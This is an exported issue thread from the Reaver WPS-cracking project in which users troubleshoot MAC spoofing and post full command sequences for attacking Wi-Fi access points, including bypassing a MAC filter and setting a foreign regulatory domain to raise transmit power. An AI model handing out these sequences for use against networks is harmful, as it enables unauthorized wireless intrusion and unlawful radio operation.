Paramat770 / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

Mac spoofing still doesn't work. #274

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
0. What version of Reaver are you using?  (Only defects against the latest 
version will be considered.)
1.4 r112
1. What operating system are you using (Linux is the only supported OS)?
Backtrack 5
2. Is your wireless card in monitor mode (yes/no)?
Yes...
3. What is the signal strength of the Access Point you are trying to crack?
-60 to -65
4. What is the manufacturer and model # of the device you are trying to crack?
Linksys e2500
5. What is the entire command line string you are supplying to reaver?
airmon-ng start wlan1
ifconfig mon0 down
macchanger -m xx:xx:xx:xx:xx:xx mon0
ifconfig mon0 up
reaver -i mon0 -b yy:yy:yy:yy:yy:yy mon0 -vv
6. Please describe what you think the issue is.
Reaver does not work when trying to fake a mac address. 
7. Paste the output from Reaver below.
[+] Switching mon0 to channel 11
[?] Restore previous session? [Y/n]
[+] Restored previous session
[+] Waiting for beacon from yy:yy:yy:yy:yy:yy
[!] WARNING: Failed to associate with yy:yy:yy:yy:yy:yy (ESSID: )
[!] WARNING: Failed to associate with yy:yy:yy:yy:yy:yy (ESSID: )
[!] WARNING: Failed to associate with yy:yy:yy:yy:yy:yy (ESSID: )
[!] WARNING: Failed to associate with yy:yy:yy:yy:yy:yy (ESSID: )
[!] WARNING: Failed to associate with yy:yy:yy:yy:yy:yy (ESSID: )
[!] WARNING: Failed to associate with yy:yy:yy:yy:yy:yy (ESSID: )
[!] WARNING: Failed to associate with yy:yy:yy:yy:yy:yy (ESSID: )
and so forth.

Original issue reported on code.google.com by nexdem...@gmail.com on 25 Mar 2012 at 7:20

GoogleCodeExporter commented 8 years ago
U need to change spoof 1st the mac on wlan0, put it in monitor mode then change 
the mac for mon0 (must be the same mac u used to spoof wlan0)or u need to 
associate with the network u wanna crack using aircrack-ng suite also use 
reaver with -A option.

Original comment by music.an...@gmail.com on 3 Apr 2012 at 6:42

GoogleCodeExporter commented 8 years ago
Tried that before as well. In that case it associates but it goes into a loop 
between identity request and response then failing and retrying, every now and 
then it gets to m2 message but it never gets all the way to m4. 

Original comment by nexdem...@gmail.com on 4 Apr 2012 at 8:47

GoogleCodeExporter commented 8 years ago
[deleted comment]
GoogleCodeExporter commented 8 years ago
i deleted a comment a little bit ago saying the op is correct but actually like 
an idiot i had my WPS disabled..
the OP is NOT correct....i have mac spoofing working correctly with reaver -A 
and i am associating with aireply

with wlan0 i set the mac address
with mon0 i just left it alone
with aireplay i used the -h and set mac same as wlan0 (which is also the 
allowed mac in the mac filter list on the AP)
i then used reaver with the --mac and set the same mac again
its working just like normal

Original comment by tdbo...@gmail.com on 24 Apr 2012 at 12:06

GoogleCodeExporter commented 8 years ago
tdbo~ I tried your method, got the same problem as in comment #2, wasn't able 
to use the --mac parameter as it doesn't exist in r113, which version do you 
have ?

Original comment by nexdem...@gmail.com on 9 May 2012 at 3:53

GoogleCodeExporter commented 8 years ago
This problem seems to be have solved. Read comment 361 on how to code around 
this. The mac of real versus virtual ie wlan0 and mon0 must be spoofed to the 
same mac in the code line that starts reaver. The code sequence is covered in 
361 and/or can be found in aircrack-ng forum general discussions posted 29 July 
12 by musket33

Musket Team A

Original comment by muske...@yahoo.com on 30 Jul 2012 at 4:24

GoogleCodeExporter commented 8 years ago
I'm still can't use reaver with spoofed mac id's, tried all combinations.
Spoofing only wlan0
Spoffing wlna0 and mon0 with the same
With -A authenticating using aircrack-ng

Allways with -mac=00:00:00:00:00:00 of course

Using Reaver v1.4 on BT5R3 with an alfa AWUS036H

Original comment by aristide...@gmail.com on 23 Oct 2012 at 10:23

GoogleCodeExporter commented 8 years ago
# To solve your mac spoofing problem use the following commands
# Remove your virtual moniters
airmon-ng stop mon0
airmon-ng stop mon1
airmon-ng stop mon2
#if your awuso36h moniter is designated wlan0 then
ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55
iw reg set BO  #Sets power to max
iwconfig wlan0 txpower 30
iwconfig wlan0 rate 1Mc # some Alfa recievers will ignore the rate command
iwconfig wlan0 up
airmon-ng start wlan0
reaver -i mon0 -a -f -c -b 55:44:33:22:11 -vv -x 60 --mac=00:11:22:33:44:55
#NOTE the hw ether mac code MUST be the same as the mac code in the reaver 
command line or the spoof will not work!

Original comment by muske...@yahoo.com on 21 Nov 2012 at 9:41

GoogleCodeExporter commented 8 years ago
Correction

The iwconfig wlan0 rate 1Mc # some Alfa recievers will ignore the rate command

should read

iwconfig wlan0 rate 1M # some Alfa recievers will ignore the rate command

My mistake sorry 

Original comment by muske...@yahoo.com on 21 Nov 2012 at 9:42